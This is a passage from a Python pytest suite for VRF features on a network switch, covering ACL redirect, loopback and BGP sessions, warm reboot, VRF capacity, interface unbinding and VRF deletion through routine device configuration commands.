redirect_dst_ports = []
redirect_dst_ports.append(vrf_intf_ports['Vrf1'][pc2_if_name])
redirect_dst_ports.append(vrf_intf_ports['Vrf2'][pc_vrf2_if_name])
self.c_vars['src_ports'] = src_ports
self.c_vars['dst_ports'] = dst_ports
self.c_vars['redirect_dst_ports'] = redirect_dst_ports
self.c_vars['pc1_v4_neigh_ips'] = pc1_v4_neigh_ips
self.c_vars['pc1_v6_neigh_ips'] = pc1_v6_neigh_ips
# load acl redirect configuration
extra_vars = {
'src_port': get_vlan_members('Vlan1000', cfg_facts)[0],
'redirect_dst_ips': redirect_dst_ips,
'redirect_dst_ipv6s': redirect_dst_ipv6s
}
duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
duthost.template(src="vrf/vrf_acl_redirect.j2", dest="/tmp/vrf_acl_redirect.json")
duthost.shell("config load -y /tmp/vrf_acl_redirect.json")
# -------- Testing ----------
yield
# -------- Teardown ----------
duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V4|rule1'")
duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V6|rule1'")
duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V4'")
duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V6'")
def test_origin_ports_recv_no_pkts_v4(self, partial_ptf_runner, ptfhost):
# verify origin dst ports should not receive packets any more
gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['dst_ports'],
'/tmp/pc01_neigh_ipv4.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
src_ports=self.c_vars['src_ports'],
fib_info_files=['/tmp/pc01_neigh_ipv4.txt']
)
def test_origin_ports_recv_no_pkts_v6(self, partial_ptf_runner, ptfhost):
# verify origin dst ports should not receive packets any more
gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['dst_ports'],
'/tmp/pc01_neigh_ipv6.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
src_ports=self.c_vars['src_ports'],
fib_info_files=['/tmp/pc01_neigh_ipv6.txt']
)
def test_redirect_to_new_ports_v4(self, partial_ptf_runner, ptfhost):
# verify redicect ports should receive packets
gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['redirect_dst_ports'],
'/tmp/redirect_pc01_neigh_ipv4.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
src_ports=self.c_vars['src_ports'],
test_balancing=True,
balancing_test_times=1000,
balancing_test_ratio=1.0, # test redirect balancing
fib_info_files=['/tmp/redirect_pc01_neigh_ipv4.txt']
)
def test_redirect_to_new_ports_v6(self, partial_ptf_runner, ptfhost):
# verify redicect ports should receive packets
gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['redirect_dst_ports'],
'/tmp/redirect_pc01_neigh_ipv6.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
src_ports=self.c_vars['src_ports'],
test_balancing=True,
balancing_test_times=1000,
balancing_test_ratio=1.0, # test redirect balancing
fib_info_files=['/tmp/redirect_pc01_neigh_ipv6.txt']
)
class TestVrfLoopbackIntf():
c_vars = {}
announce_prefix = '10.10.10.0/26'
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
lb0_ip_facts = get_intf_ips('Loopback0', cfg_facts)
vlan1000_ip_facts = get_intf_ips('Vlan1000', cfg_facts)
lb2_ip_facts = get_intf_ips('Loopback2', cfg_facts)
vlan2000_ip_facts = get_intf_ips('Vlan2000', cfg_facts)
self.c_vars['lb0_ip_facts'] = lb0_ip_facts
self.c_vars['lb2_ip_facts'] = lb2_ip_facts
self.c_vars['vlan1000_ip_facts'] = vlan1000_ip_facts
self.c_vars['vlan2000_ip_facts'] = vlan2000_ip_facts
# deploy routes to loopback
for ver, ips in lb0_ip_facts.iteritems():
for vlan_ip in vlan1000_ip_facts[ver]:
nexthop = vlan_ip.ip
break
for ip in ips:
ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip, nexthop))
for ver, ips in lb2_ip_facts.iteritems():
for vlan_ip in vlan2000_ip_facts[ver]:
nexthop = vlan_ip.ip
break
for ip in ips:
ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip, nexthop))
duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=1")
# -------- Testing ----------
yield
# -------- Teardown ----------
# routes on ptf could be flushed when remove vrfs
duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=0")
def test_ping_vrf1_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for ver, ips in self.c_vars['lb0_ip_facts'].iteritems():
for ip in ips:
if ip.version == 4:
# FIXME Within a vrf, currently ping(4) does not support using
# an ip of loopback intface as source(it complains 'Cannot assign
# requested address'). An alternative is ping the loopback address
# from ptf
ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip.ip))
else:
neigh_ip6 = self.c_vars['vlan1000_ip_facts']['ipv6'][0].ip + 1
duthost.shell("ping6 {} -I Vrf1 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))
def test_ping_vrf2_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for ver, ips in self.c_vars['lb2_ip_facts'].iteritems():
for ip in ips:
if ip.version == 4:
# FIXME Within a vrf, currently ping(4) does not support using
# an ip of loopback intface as source(it complains 'Cannot assign
# requested address'). An alternative is ping the loopback address
# from ptf
ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip.ip))
else:
neigh_ip6 = self.c_vars['vlan2000_ip_facts']['ipv6'][0].ip + 1
duthost.shell("ping6 {} -I Vrf2 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))
@pytest.fixture
def setup_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# ----------- Setup ----------------
# FIXME Create a dummy bgp session.
# Workaroud to overcome the bgp socket issue.
# When there are only vrf bgp sessions and
# net.ipv4.tcp_l3mdev_accept=1, bgpd(7.0) does
# not create bgp socket for sessions.
duthost.shell("vtysh -c 'config terminal' -c 'router bgp 65444'")
# vrf1 args, vrf2 use the same as vrf1
peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
vlan_port = get_vlan_members('Vlan1000', cfg_facts)[0]
vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
ptf_direct_ip = g_vars['vlan_peer_ips'][('Vrf1', vlan_peer_port)]['ipv4'][0]
# add route to ptf_speaker_ip
for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
nh = ips['ipv4'][0].ip
duthost.shell("vtysh -c 'configure terminal' -c 'ip route {} {} vrf {}'".format(peer_range, nh , vrf))
duthost.shell("ping {} -I {} -c 3 -f -W2".format(nh, vrf))
# add speaker ips to ptf macvlan ports
for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
exabgp_dir = "/root/exabgp"
ptfhost.file(path=exabgp_dir, state="directory")
extra_vars = {
'exabgp_dir': exabgp_dir,
'announce_prefix': self.announce_prefix,
'peer_asn' : cfg_facts['DEVICE_METADATA']['localhost']['bgp_asn'],
'my_asn' : bgp_speaker_asn,
'speaker_ip': ptf_speaker_ip.ip,
'direct_ip' : ptf_direct_ip.ip,
'namespace' : g_vars['vlan_peer_vrf2ns_map'].values(),
'lo_addr' : get_intf_ips('Loopback0', cfg_facts)['ipv4'][0].ip
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, 'config.ini'))
# deploy start script
ptfhost.template(src="vrf/bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, 'start.sh'), mode="u+rwx")
# kill exabgp if any
ptfhost.shell("pkill exabgp || true")
# start exabgp instance
ptfhost.shell("bash %s/start.sh" % exabgp_dir)
# ensure exabgp started
ptfhost.shell("pgrep exabgp")
# make sure routes announced to bgp neighbors
time.sleep(10)
# -------- Testing ----------
yield
# -------- Teardown ---------
# del route to ptf_speaker_ip on dut
for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
duthost.shell("vtysh -c 'configure terminal' -c 'no ip route {} {} vrf {}'".format(peer_range, ips['ipv4'][0], vrf))
# kill exabgp
ptfhost.shell("pkill exabgp || true")
# del speaker ips from ptf ports
for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
ptfhost.shell("ip netns exec {} ip address del {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
# FIXME workround to overcome the bgp socket issue
#duthost.shell("vtysh -c 'config terminal' -c 'no router bgp 65444'")
@pytest.mark.usefixtures('setup_bgp_with_loopback')
def test_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
for vrf in cfg_facts['VRF']:
bgp_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout'])
route_info = duthost.shell("vtysh -c 'show bgp vrf {} ipv4 {}'".format(vrf, self.announce_prefix))
# Verify bgp sessions are established
assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['state'] == 'Established', \
"Bgp peer {} should be Established!".format(ptf_speaker_ip.ip)
# Verify accepted prefixes of the dynamic neighbors are correct
assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['pfxRcd'] == 1
class TestVrfWarmReboot():
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_warm_reboot(self, ptfhost, tbinfo):
# -------- Setup ----------
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt',
limited_podset_number=50,
limited_tor_number=16)
# -------- Testing ----------
yield
# -------- Teardown ----------
#FIXME Might need cold reboot if test failed?
pass
@pytest.mark.usefixtures('disable_swss_warm_boot_flag')
def test_vrf_swss_warm_reboot(self, duthosts, rand_one_dut_hostname, cfg_facts, partial_ptf_runner):
duthost = duthosts[rand_one_dut_hostname]
# enable swss warm-reboot
duthost.shell("config warm_restart enable swss")
exc_que = Queue.Queue()
params = {
'ptf_runner': partial_ptf_runner,
'exc_queue': exc_que, # use for store exception infos
'testname': 'vrf_test.FibTest',
'fib_info_files': ["/tmp/vrf1_fib.txt"],
'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
}
traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
# send background traffic
traffic_in_bg.start()
logger.info("Start transmiting packets...")
# start swss warm-reboot
duthost.shell("service swss restart")
logger.info("Warm reboot swss...")
# wait until background traffic finished
traffic_in_bg.join()
logger.info("Transmit done.")
passed = True
if exc_que.qsize() != 0:
passed = False
exc_type, exc_obj, exc_trace = exc_que.get()
assert passed == True, "Traffic Test Failed \n {}".format(str(exc_obj))
# wait until components finish reconcile
tbd_comp_list = finalize_warmboot(duthost)
assert len(tbd_comp_list) == 0, \
"Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
# basic check after warm reboot
assert wait_until(300, 20, 0, duthost.critical_services_fully_started), \
"All critical services should fully started!{}".format(duthost.critical_services)
up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
assert wait_until(300, 20, 0, check_interface_status, duthost, up_ports), \
"All interfaces should be up!"
def test_vrf_system_warm_reboot(self, duthosts, rand_one_dut_hostname, localhost, cfg_facts, partial_ptf_runner):
duthost = duthosts[rand_one_dut_hostname]
exc_que = Queue.Queue()
params = {
'ptf_runner': partial_ptf_runner,
'exc_queue': exc_que, # use for store exception infos
'testname': 'vrf_test.FibTest',
'fib_info_files': ["/tmp/vrf1_fib.txt"],
'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
}
traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
# send background traffic
traffic_in_bg.start()
logger.info("Start transmiting packets...")
# start system warm-reboot
logger.info("Warm reboot ...")
reboot(duthost, localhost, reboot_type="warm")
# wait until background traffic finished
traffic_in_bg.join()
logger.info("Transmit done.")
passed = True
if exc_que.qsize() != 0:
passed = False
exc_type, exc_obj, exc_trace = exc_que.get()
assert passed == True, "Test Failed: \n Exception infos => {}".format(str(exc_obj))
# wait until components finish reconcile
comp_list = ['orchagent', 'neighsyncd', 'bgp']
tbd_comp_list = finalize_warmboot(duthost, comp_list=comp_list)
assert len(tbd_comp_list) == 0, "Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
# basic check after warm reboot
assert wait_until(300, 20, 0, duthost.critical_services_fully_started), "Not all critical services are fully started"
up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
assert wait_until(300, 20, 0, check_interface_status, duthost, up_ports), "Not all interfaces are up"
class TestVrfCapacity():
VRF_CAPACITY = 1000
# limit the number of vrfs to be covered to limit script execution time
TEST_COUNT = 100
src_base_vid = 2000
dst_base_vid = 3000
ipnet1 = IPNetwork("192.1.1.0/31")
ipnet2 = IPNetwork("192.2.1.0/31")
vrf_name_tpl = "Vrf_cap_{}"
sub_if_name_tpl = "e{}.v{}" # should not include 'eth'
route_prefix = "200.200.200.0/24"
cleanup_method = 'reboot' # reboot or remove
@pytest.fixture(scope="class")
def vrf_count(self, request):
vrf_capacity = request.config.option.vrf_capacity or self.VRF_CAPACITY # get cmd line option value, use default if none
return vrf_capacity - 3 # minus global(default) VRF and Vrf1/Vrf2
@pytest.fixture(scope="class")
def random_vrf_list(self, vrf_count, request):
test_count = request.config.option.vrf_test_count or self.TEST_COUNT # get cmd line option value, use default if none
return sorted(random.sample(xrange(1, vrf_count+1), min(test_count, vrf_count)))
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_capacity(self, duthosts, rand_one_dut_hostname, ptfhost, localhost, cfg_facts, vrf_count, random_vrf_list, request):
"""
Setup $VRF_CAPACITY(minus global VRF and Vrf1/Vrf2) vrfs,
2 vlan interfaces per vrf,
1 ip address per vlan interface,
1 static route per vrf, it set $route_prefix(200.200.200.0/24) next_hop point to vlan_2's neigh ip,
use the 2rd member port of Vlan1000/2000 as trunk port.
Example:
VRF RIFs Vlan_Member_Port IP Neighbor_IP(on PTF) Static_Route
Vrf_Cap_1 Vlan2001 Ethernet2 192.1.1.0/31 192.1.1.1/31 ip route 200.200.200.0/24 192.2.1.1 vrf Vrf_Cap_1
Vlan3001 Ethernet14 192.2.1.0/31 192.2.1.1/31
Vrf_Cap_2 Vlan2002 Ethernet2 192.1.1.2/31 192.1.1.3/31 ip route 200.200.200.0/24 192.2.1.3 vrf Vrf_Cap_2
Vlan3002 Ethernet14 192.2.1.2/31 192.2.1.3/31
...
"""
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
duthost.shell("logger -p INFO -- '-------- {} start!!! ---------'".format(request.cls.__name__))
# increase ipv4 neigh threshold to 2k
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=2048")
# use 2rd member port of Vlan1000/Vlan2000 as trunk port
dut_port1 = get_vlan_members('Vlan1000', cfg_facts)[1]
dut_port2 = get_vlan_members('Vlan2000', cfg_facts)[1]
ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
# base ip range to be assigned to vlan rif
ip1 = self.ipnet1
ip2 = self.ipnet2
# setup $vrf_count vrfs on dut
dut_extra_vars = {
'vrf_count': vrf_count,
'src_base_vid': self.src_base_vid,
'dst_base_vid': self.dst_base_vid,
'vrf_name_tpl': self.vrf_name_tpl,
'ip1': ip1,
'ip2': ip2,
'dut_port1': dut_port1,
'dut_port2': dut_port2,
'route_prefix': self.route_prefix,
'op_code': 'add'
}
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
cfg_attrs_map = OrderedDict()
# In wrost case(1k vrfs, 2k rifs), remove a vlan could take 60~80ms
# ("VlanMgr::removeHostVlan ip link del Vlan{{vlan_id}} && bridge vlan del vid {{vlan_id}} dev Bridge self" take most of the time)
# So wait up to 5(s) + 80(ms) * 2(vlans per vrf) * vrf_count when remove vlans
cfg_attrs_map['vlan'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.08 * 2 * vrf_count}
# In wrost case(1k vrfs, 2k rifs), remove a vlan member from vlan could take 160~220ms
# ("vlanmgrd::removeHostVlanMember /sbin/bridge vlan show dev <devname>" take most of the time)
# So wait up to 5(s) + 220(ms) * 2(2 vlan members per vrf) * vrf_count
cfg_attrs_map['vlan_member'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.2 * 2 * vrf_count}
# In wrost case(1k vrfs, 2k rifs), remove a vrf could take 6~10ms
# So wait up to 5(s) + 10(ms) * vrf_count when remove vrfs
cfg_attrs_map['vrf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.01 * vrf_count}
# In wrost case(1k vrfs, 2k rifs), remove a rif could take 30~40ms
# ("IntfMgr::getIntfIpCount ip address show <alias> master <vrfName>" take most of the time)
# So wait up to 5(s) + 40(ms) * 2(rifs per vrf) * vrf_count when remove rifs
cfg_attrs_map['vrf_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5 + 0.04 * 2 * vrf_count}
cfg_attrs_map['vlan_intf'] = {'add_sleep_time': 2, 'remove_sleep_time': 5}
for cfg_name, attrs in cfg_attrs_map.iteritems():
src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
render_file = '/tmp/vrf_capacity_{}_cfg.json'.format(cfg_name)
duthost.template(src=src_template, dest=render_file)
duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
time.sleep(attrs['add_sleep_time'])
# setup static routes
duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
duthost.shell("/tmp/vrf_capacity_route_cfg.sh")
# setup peer ip addresses on ptf
ptf_extra_vars = {
'vrf_count': vrf_count,
'src_base_vid': self.src_base_vid,
'dst_base_vid': self.dst_base_vid,
'sub_if_name_tpl': self.sub_if_name_tpl,
'ip1': ip1,
'ip2': ip2,
'ptf_port1': ptf_port1,
'ptf_port2': ptf_port2,
'random_vrf_list': random_vrf_list
}
ptfhost.host.options['variable_manager'].extra_vars.update(ptf_extra_vars)
ptfhost.template(src='vrf/vrf_capacity_ptf_cfg.j2', dest='/tmp/vrf_capacity_ptf_cfg.sh', mode="0755")
ptfhost.shell('/tmp/vrf_capacity_ptf_cfg.sh')
# ping to trigger neigh resolving, also acitvate the static routes
dut_extra_vars.update({
'random_vrf_list': random_vrf_list,
'count': 1,
'timeout': 1
})
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_neigh_learning.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_neigh_learning.sh', module_ignore_errors=True)
# wait for route/neigh entries apply to asic
time.sleep(5)
# -------- Testing ----------
yield
# -------- Teardown ----------
# remove cfg on ptf
ptfhost.shell("ip address flush dev eth{}".format(ptf_port1))
ptfhost.shell("ip address flush dev eth{}".format(ptf_port2))
ptfhost.template(src='vrf/vrf_capacity_del_ptf_cfg.j2', dest='/tmp/vrf_capacity_del_ptf_cfg.sh', mode="0755")
ptfhost.shell('/tmp/vrf_capacity_del_ptf_cfg.sh')
duthost.shell("config interface startup {}".format(dut_port1))
duthost.shell("config interface startup {}".format(dut_port2))
# remove cfg on dut
if self.cleanup_method == 'reboot':
reboot(duthost, localhost)
else:
duthost.shell("config interface shutdown {}".format(dut_port1))
duthost.shell("config interface shutdown {}".format(dut_port2))
# flush macs, arps and neighbors
duthost.shell("sonic-clear arp")
duthost.shell("sonic-clear fdb all")
# remove static routes
dut_extra_vars['op_code'] = 'del'
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_route_cfg.j2', dest='/tmp/vrf_capacity_route_cfg.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_route_cfg.sh')
# remove ip addr, intf, vrf, vlan member, vlan cfgs
for cfg_name, attrs in reversed(cfg_attrs_map.items()):
src_template = 'vrf/vrf_capacity_{}_cfg.j2'.format(cfg_name)
render_file = '/tmp/vrf_capacity_del_{}_cfg.json'.format(cfg_name)
duthost.template(src=src_template, dest=render_file)
duthost.shell("sonic-cfggen -j {} --write-to-db".format(render_file))
time.sleep(attrs['remove_sleep_time'])
duthost.shell("logger -p INFO -- '-------- {} end!!! ---------'".format(request.cls.__name__))
def test_ping(self, duthosts, rand_one_dut_hostname, random_vrf_list):
duthost = duthosts[rand_one_dut_hostname]
dut_extra_vars = {
'vrf_name_tpl': self.vrf_name_tpl,
'random_vrf_list': random_vrf_list,
'ip1': self.ipnet1,
'ip2': self.ipnet2
}
duthost.host.options['variable_manager'].extra_vars.update(dut_extra_vars)
duthost.template(src='vrf/vrf_capacity_ping.j2', dest='/tmp/vrf_capacity_ping.sh', mode="0755")
duthost.shell('/tmp/vrf_capacity_ping.sh')
def test_ip_fwd(self, partial_ptf_runner, random_vrf_list, ptfhost):
ptf_port1 = g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'][1]
ptf_port2 = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][1]
dst_ips = [str(IPNetwork(self.route_prefix)[1])]
gen_specific_neigh_file(dst_ips, [[ptf_port2]], '/tmp/vrf_capability_fwd.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.CapTest",
src_ports=[ptf_port1],
fib_info_files=['/tmp/vrf_capability_fwd.txt'],
random_vrf_list=random_vrf_list,
src_base_vid=self.src_base_vid,
dst_base_vid=self.dst_base_vid
)
class TestVrfUnbindIntf():
c_vars = {
'rebind_intf': True # rebind interface during teardown stage
}
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_unbindintf(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
duthost.shell("config interface vrf unbind PortChannel0001")
# wait for neigh/route flush
time.sleep(5)
# -------- Testing ----------
yield
# -------- Teardown ----------
if self.c_vars['rebind_intf']:
self.rebind_intf(duthost)
wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts)
def rebind_intf(self, duthost):
duthost.shell("config interface vrf bind PortChannel0001 Vrf1")
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].iteritems():
for ip in ips:
duthost.shell("config interface ip add PortChannel0001 {}".format(ip))
@pytest.fixture(scope='class')
def setup_vrf_rebind_intf(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
self.rebind_intf(duthost)
self.c_vars['rebind_intf'] = False # Mark to skip rebind interface during teardown
# check bgp session state after rebind
assert wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts), \
"Bgp sessions should be re-estabalished after Portchannel0001 rebind to Vrf"
def test_pc1_ip_addr_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
ip_addr_show = duthost.shell("ip addr show PortChannel0001")['stdout']
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].iteritems():
for ip in ips:
assert str(ip) not in ip_addr_show, "The ip addresses on PortChannel0001 should be flushed after unbind from vrf."
def test_pc1_neigh_flushed(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
# verify ipv4
show_arp = duthost.shell("show arp")['stdout']
assert 'PortChannel0001' not in show_arp, "The arps on PortChannel0001 should be flushed after unbind from vrf."
# FIXME
# ipv6 neighbors do not seem to be flushed by kernel whenever remove ipv6 addresses
# from interface. So comment out the test of ipv6 neigh flushed.
# # verify ipv6
# show_ndp = duthost.shell("show ndp")['stdout']
# assert 'PortChannel0001' not in show_ndp, "The neighbors on PortChannel0001 should be flushed after unbind from vrf."
def test_pc1_neigh_flushed_by_traffic(self, partial_ptf_runner, ptfhost):
pc1_neigh_ips = []
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0001'].iteritems():
for ip in ips:
pc1_neigh_ips.append(str(ip.ip+1))
gen_specific_neigh_file(pc1_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0001']],
'/tmp/unbindvrf_neigh_1.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
ipv4=True,
ipv6=False
)
def test_pc1_routes_flushed(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
dst_intfs=['PortChannel0001'],
render_file="/tmp/unbindvrf_fib_1.txt")
# Send packet from downlink to uplink, port channel1 should no longer receive any packets
partial_ptf_runner(
testname="vrf_test.FibTest",
pkt_action='drop',
fib_info_files=["/tmp/unbindvrf_fib_1.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_pc2_neigh(self, partial_ptf_runner, ptfhost):
pc2_neigh_ips = []
for ver, ips in g_vars['vrf_intfs']['Vrf1']['PortChannel0002'].iteritems():
for ip in ips:
pc2_neigh_ips.append(str(ip.ip+1))
gen_specific_neigh_file(pc2_neigh_ips, [g_vars['vrf_intf_member_port_indices']['Vrf1']['PortChannel0002']],
'/tmp/unbindvrf_neigh_2.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='fwd',
fib_info_files=['/tmp/unbindvrf_neigh_2.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
)
def test_pc2_fib(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
dst_intfs=['PortChannel0002'],
render_file="/tmp/unbindvrf_fib_2.txt")
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/unbindvrf_fib_2.txt"],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
@pytest.mark.usefixtures('setup_vrf_rebind_intf')
def test_pc1_neigh_after_rebind(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='fwd',
fib_info_files=['/tmp/unbindvrf_neigh_1.txt'],
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'],
ipv4=True,
ipv6=False
)
@pytest.mark.usefixtures('setup_vrf_rebind_intf')
def test_vrf1_fib_after_rebind(self, ptfhost, tbinfo, partial_ptf_runner):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/rebindvrf_vrf1_fib.txt')
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/rebindvrf_vrf1_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
class TestVrfDeletion():
c_vars = {
'restore_vrf': True
}
def restore_vrf(self, duthost):
duthost.shell("config vrf add Vrf1")
for intf, ip_facts in g_vars['vrf_intfs']['Vrf1'].iteritems():
duthost.shell("config interface vrf bind %s Vrf1" % intf)
for ver, ips in ip_facts.iteritems():
for ip in ips:
duthost.shell("config interface ip add {} {}".format(intf, ip))
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_deletion(self, duthosts, rand_one_dut_hostname, ptfhost, tbinfo, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file="/tmp/vrf1_fib.txt")
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file="/tmp/vrf2_fib.txt")
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
duthost.shell("config vrf del Vrf1")
# -------- Testing ----------
yield
# -------- Teardown ----------
if self.c_vars['restore_vrf']:
self.restore_vrf(duthost)
wait_until(120, 10, 0, check_bgp_facts, duthost, cfg_facts)
@pytest.fixture(scope='class')
def setup_vrf_restore(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
self.restore_vrf(duthost)
self.c_vars['restore_vrf'] = False # Mark to skip restore vrf during teardown
# check bgp session state after restore
